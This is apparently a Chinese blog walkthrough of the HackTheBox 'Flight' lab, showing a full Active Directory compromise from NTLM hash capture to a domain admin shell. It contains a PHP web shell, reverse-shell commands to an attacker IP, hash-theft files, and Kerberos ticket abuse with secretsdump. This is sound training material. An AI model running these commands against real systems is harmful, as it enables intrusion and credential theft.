首页 > 其他分享 >hackthebox flight insane

hackthebox flight insane

时间:2023-06-11 16:45:31浏览次数:81  
标签:insane shell flight -- hackthebox exe 11.187 10.10 smb

主机发现

nmap -sV -sC -oN flight 10.10.11.187

88端口开放所以是一个域环境

tips:在域环境中,只要与kerberos相关的事情,必须要与域环境中的时间一致

域环境smbenum主机头

由于开放了445端口,首先用cme枚举445端口 cmd --help 枚举可用常规选项 cme smb --help 查看smb内的选项

cme smb 10.10.11.187 枚举运行smb服务的这个主机名是什么 显示为G0 添加到hosts文件中

查看web服务

发现是一个类似预定机票的页面

利用gobuster爆破目录

gobuster -u http://10.10.11.187 -w /opt/xx.xxdictionary -x php,git,asp

域环境enum web的主机头 通过host字段 

目的:查看有没有其他的主机开启了web服务

ffuf -u http://10.10.11.187 -H "host: FUZZ.flight.htb" -w /xx dictionary -mc all -fs 7069

根据显示出哪个多fs的size就是哪个,一般多的都是不正确的

跑出一个school主机头 写入hosts文件中

访问这个主机开启的web服务 点击导航栏看到url的变化从school.flight.htb/index.php出现几个字符 ?view=about.html

查看school.flight.htb/about.html出现一段文本,那这个view的作用就是将这段about.html的文本渲染到已经形成好的页面上,有点像先摆好面包,再决定上什么酱的感觉

那么这个interact参数有可能存在目录穿越漏洞(单纯泄露文件内容)和本地文件包含漏洞(会执行代码)

CTRL U 看看网页源代码有没有显示出php的页面存不存在这个漏洞 

 发现由php代码,查看发现是对view的内容后缀名由要求 只要由.. \ htaccess 和shtml就直接报错拦截

所以不能使用目录穿越漏洞,本地包含可以试一下

抓包尝试一下看看能不能进进行远程文件包含

发送该请求,并在kali监听445端口看看有没有申请访问的列表

nc -lvnp 445

确实有访问到,所以可以利用responder来监听网卡获得信息

python3 responder.py -I tun0

再次回到抓包的页面利用view进行一个远程文件访问kali的smb服务得到信息 (第一次失败)

因为之前我们尝试访问smb的时候用的就是这两个路径存在缓存的关系,修改subscribe添加一个2即可

成功获得hash值

copy这个ntlmhash到hashcat中进行破解

hashcat hashfile /usr/share/wordlists/rockyou.txt

成功破解

密码是S@Ss!K@*t13

所以这个用户名密码是SVC_APACHE/S@Ss!K@*t13

如果这里没有即使记录到帐号以及密码,那么可以使用sqlite3 responder.db .dump查看对应的账号密码

由于不知道这个账号密码是哪个服务的账号密码可以使用cme进行爆破猜解

首先查看445端口是不是这个账号密码
cme smb 10.10.11.187  -u 'svc_apache' -p 'S@Ss!K@*t13'

再试一下--shares 有没有共享的目录

存在

利用smbclient和这对账号密码进行登录查看有没有什么值得的信息

smbclient //10.10.11.187 -U 'svc_apache' //10.10.11.187/Shared

password:xxx

由于smb里面展示的服务比较多,我们先利用cmd的--users选项将所有的users都能打印出来

cmd smb 10.10.11.187 -u 'svc_apache' -p ' 密码' --users > users.txt

利用awk将第五列的所有用户名都打印出来

cme smb 10.10.11.187 -u 'svc_apache' -p 'mima ' --users  | awk '{print $5}'

利用cme进行密码喷射看看会不会有其他用户也会用同一个密码进行登录

将上述所有的账户写到users.txt中

cme smb 10.10.11.187 -u users.txt -p '密码' 

找到了一个就停下来了 但是这是我们已经有的密码 添加--continue-on-success

cme smb 10.10.11.187 -u users.txt -p '密码' --continue-on-success

发现还有一个叫S.Moon的用户用的也是这个密码

利用cme查看moon用户再smb共享了什么文件夹

cme smb 10.10.11.187 -u 'S.Moon' -p '密码' --shares

再利用smbclient -U 'S.Moon' //10.10.11.187/Web等逐个查看共享了什么东西

可以利用这个共享目录放一个poison file去获得一个新得hash

 discovering a writeable share dropping a scf file to get a hash

but easier way to create one poison file is ntlm_theft 

git clone https://github.com/Greenwolf/ntlm_theft  

利用这个工具生成几个文件

python ntlm_theft.py -g all -s 10.10.14.8 -f pleasesubscribe

生成文件之后,进入到靶机smb里面进行

同时利用responder监听tun0端口抓取smb hash

python responder.py -I tun0 监听完成后 再次进入到靶机smb里面进行操作

将我们利用ntlm_theft生成的文件put到靶机smb中

smb:> put pleasesubscribe.scf #报错

可能是权限得问题

那再尝试一下其他的

smb:> put desktop.ini  #成功

#desktop文件长这样

成功上传到靶机后,该poison file就会自动执行 sleep 120 来确定两分钟之内responder有没有抓到hash 如果没有的话就换下一个文件

responder成功抓取到hash

复制保存到hash.txt并利用hashcat进行破解

hashcat hash.txt /usr/share/wordlists/rockyou.txt #让hashcat自动寻找是什么类型的文件

找到密码为Tikkycoll_431012284   将获得到的账号以及密码都保存好

由于他是smb的hash,所以也可以利用cme获取这个C.BUM用户开启了什么smb的共享目录

cme smb 10.10.11.187 -u 'C.BUM' -p 'Tikkycoll_431012284 --share

发现这个web目录具有可读可写权限,尝试能不能在里面写一个shell文件

在/tmp目录下创建一个shell.php

<?php system($_REQUEST['cmd']);?>

靶机smb命令行

smb :> lcd /tmp目录下 #local cd 本地目录切换

smb :> put shell.php

根据目录提示所以这个shell.php应该在根目录的位置

直接访问 http://flight.htb/shell.php?cmd=whoami #成功

利用nc或者bash直接反弹shell

但是这里与以往不同的是,这个靶机是windows主机,所以要额外下载nc64.exe利用smb上传到靶机上

#下载netcat

点击netcat 1.12download并解压到/tmp目录下 #主要是为了和smb的的local 目录对应

smb :> put nc64.exe #成功上传

http://flight.htb/shell.php?cmd=nc64.exe -e powershell.exe10.10.14.8 9001 #注意是powershell.exe

然后突然报错说404页面 说明我们上传的shell.php被删掉了 可能存在定期删除上传文件的机制

重新put一下shell.php和nc64.exe 

上传成功后refresh一下 kali段监听的9001成功获取powershell

查看权限

whoami 

想上下快速打出命令的时候发现是[[A和]]B 重新利用rlwrap nc -lvnp 9001监听即可

获取shell后想找一个能够写入的目录

利用icacls并指定某个目录去查看这个目录的权限

icacls development

说明flight\C.Bum是具有这个目录的写权限

在powershell中切换用户

runas /user:c.bum cmd

有一个项目叫runascs

 https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 下载zip文件

并解压文件出两个exe文件,利用curl将runascs文件上传到靶机上

curl http://10.10.14.8/runascs.exe -o runascs.exe

根据runascs的用法 后面跟C.bum Tikkycoll_431012284 'nc -e powershell.exe 10.10.14.8 9001' -r 

所以还要将nc64.exe上传到靶机上

curl http://10.10.14.8:8000/nc64.exe

再看看runascs的example能查看到runascs后 重定向一个指定的命令到远程主机

.\runascs c.bum passwd powershell.exe -r 10.10.14.8:9001

成功获取到账户是C.bum用户的shell

然后进入到inethub的development目录,因为上面用moon的账户利用icacls查看过这个development目录对于用户c.bum有写权限

cd \inethub\development目录

写一个shell文件进去 --可以利用

或者下载/laudanum下aspx/shell.aspx

修改shell.aspx文件的目的地址以及端口

并用靶机shellcurl到development目录下

curl http://10.10.14.8/shell.aspx -o rev.aspx 

1.靶机将kali上的shell.aspx下载到development目录下

2.再尝试利用curl看看能不能直接执行shell.aspx文件 (失败) 

3.上传chisel进行http隧道 下载的是windowsamd64的版本 和linuxamd64版本

 (kali做服务器模式,让靶机链接kali)

kali server chmod +x chisel_linux_amd64  ./chisel_linux_amd64 -p  8001

windows靶机 : curl http://10.10.14.8:8000/chisel -o chisel.exe

运行 : chisel.exe client 10.10.14.8:8001 L:8000:127.0.0.1:8002

失败

报错: client cannot listen on L:8000=> 8002

(kali主动连接客户端模式 --reverse)

kali ./chisel_linux_amd64 -p 8001 --reverse

windows: chisel.exe client 10.10.14.8:8001 R:8002:127.0.0.1:8000

链接成功

kali访问本地的8002端口即可访问到靶机上上传的shell.aspx文件

利用这个命令执行的接口进行nc64.exe -e poweshell.exe 10.10.14.8 9001 将iis用户apppool\defaultapppool用户反弹shell

kali开启监听 :rlwrap nc -lvnp 9001

成功获取到shell,但是不确定这个shell是不是system级别的账户 这里可以利用responder然后在这个用户的shell里访问\\10.10.14.8\ipp\sec来访问kali的smb目录并开启responder抓取密码以及信息

成功抓取到并且前面是G0$的开头说明这个是system级别的用户

利用这个system级别的账户做一个tgt委派获得这个系统的ticket,再用来转储域或DC同步 

利用rubeus来进行攻击

Rubeus里面的kerberoast支持对所有用户或者特定用户执行kerberoasting操作,其原理在于先用LDAP查询于内的spn,再通过发送TGS包,然后直接打印出能使用 hashcat 或 john 爆破的Hash

 在靶机的iis级账户shell中利用curl下载rubeus.exe

运行rubeus.exe

./rubeus.exe  tgtdeleg /nowrap #成功获取一张TGT

将ticket.kirbi复制出来并命名为ticket.kirbi.bare64 因为上面写明了是经过了base64加密后的ticket

cat ticket.kirbi.base64 | base64 -d > kirbi.ticket 

再利用kirbi2ccache ticket.kirbi ticket.ccache

生成完成 得到了一个ticket.ccache  file ticket.ccache is data

将票据注入到KRB5CCNAME中

export KRB5CCNAME=ticket.ccache

再利用secretdump.py进行打印 注意这张票据是g0开头,所以主机头要加一个g0

发现是报错并没有注入成功

注意域渗透最关键的一步也是要同步时钟

用ntpdate -s flight.htb对域环境的时间进行同步

发现回退了几个小时,再利用secretdump.py进行打印账户密码

secretdump.py -k --no-pass g0.flight.htb (失败)

仍然是报错 说是ldap的过滤器有问题

那就切换成impacket-secretsdump.py进行打印 

impacket-secretsdump.py -k --no-pass g0.flight.htb

成功打印

发现有administrator的hash

利用cme对administrator的smb进行账户和密码hash的检验

cme smb -u 'administrator' -H 'aad3bxxxxx:43bbfc530xxx17c'

说明是这个密码

再利用psexec.py获取administrator的shell

psexec.py [email protected] -hashes 

成功获取shell

查看是否存在dig域传送获取所有的解析记录

利用dig 检测dns域传送漏洞

这里涉及dig 一个重要的命令axfr:

axfr 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。

我们只要欺骗dns服务器发送一个axfr请求过去, 如果该dns服务器上存在该漏洞,就会返回所有的解析记录值

dig axfr @10.10.11.187

 

 

标签:insane,shell,flight,--,hackthebox,exe,11.187,10.10,smb
From: https://www.cnblogs.com/lisenMiller/p/17437460.html

相关文章

  • hackthebox sniper medium
    主机发现nmap--min-rate1000-p-10.10.10.151发现80和445端口端口探测首先利用smbclient进行端口探测smbclient-L//10.10.10.151连接错误(后面发现是因为本地smb配置错误导致的)切换方向访问80端口发现是一个类似博客的页面鼠标悬浮可以查看到左下角的悬浮跳......
  • hackthebox --interface medium
    主机发现nmap-sV-sC-O-p22,8010.10.11.200-oNports 访问80页面,主页面是这样的 再访问一下index.php或者index.html发现是404错误,有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露利用f12查看js源码搜索http://或者/或者/upload这里......
  • hackthebox --aragog
    主机发现与爆破nmap-sT--min-rate1000010.10.10.78nmap-sT-sV-sC-O-p22,21,8010.10.10.78 发现有ftp匿名登陆└─$ftp10.10.10.78Connectedto10.10.10.78.220(vsFTPd3.0.3)Name(10.10.10.78:kali):anonymous230Loginsuccessful.Remotesystemtypeis......
  • 使用增强版 singleflight 合并事件推送,效果炸裂!
    hello,大家好啊,我是小楼。最近在工作中对Go的singleflight包做了下增强,解决了一个性能问题,这里记录下,希望对你也有所帮助。singleflight是什么singleflight直接翻译为”单(次)飞(行)“,它是对同一种请求的抑制,保证同一时刻相同的请求只有一个在执行,且在它执行期间的相同请求都......
  • 解决TestFlight提交时出现的ITMS-90426错误问题
    转载:http://kxdang.com/topic/appuploader/iosdev008.html在iOS应用开发中,我们经常使用TestFlight进行内测和分发应用程序。然而,有时候我们会遇到一个名叫“ITMS-90426错误”的问题,这会导致我们无法将应用程序提交到TestFlight进行审核。这种情况通常发生在我们的应用程序包含了一......
  • K8s报错:[preflight] WARNING: JoinControlPane.controlPlane settings will be ignore
    一、报错信息[preflight]WARNING:JoinControlPane.controlPlanesettingswillbeignoredwhencontrol-planeflagisnotset.[preflight]Runningpre-flightcheckserrorexecutionphasepreflight:[preflight]Somefatalerrorsoccurred:[ERRORFileAvailabl......
  • HackTheBox-Lame
    nmap扫一下端口┌──(kali㉿kali)-[~/htb/lame]└─$catnmap.txt#Nmap7.93scaninitiatedSatApr2200:01:102023as:nmap-n-v-sC-sV-oNnmap.txt-Pn10.10.10.3Nmapscanreportfor10.10.10.3Hostisup(0.55slatency).Notshown:996filteredtcp......
  • HackTheBox-Holiday
    Reconnaissancenmap通过nmap扫描发现了靶机只存在ssh和Node.js框架下的http服务。进入网站首页并没有发现什么有用的信息。#Nmap7.92scaninitiatedTueApr1807:38:062023as:nmap-Pn-sV-sC-A-oNnmap.txt10.10.10.25Nmapscanreportfor10.10.10.25Hostis......
  • D - Umka and a Long Flight
    题目D-UmkaandaLongFlight题意给一个整数n(1<=n&&n<=44)再给衣柜坐标x,y,从1开始,表示在一个长为f(n+1),宽为f(n)的长方形里的某一个1*1的小正方形长为f(n+1),宽为f(n)的长方形,由两个1*1的正方形拼成,然后由2~n边长的正方形拼成f(n)表示斐波那契数列,f[0]=f[1]=1......
  • 苹果应用上传TestFlight安装测试教程
    通过本篇教程,可以学习到ios证书申请和打包ipa上传到AppStore进行TestFlight测试的流程!TestFlight测试分内部及外部测试,针对没有上架的app,可以通过此方式安装到手机测试。内......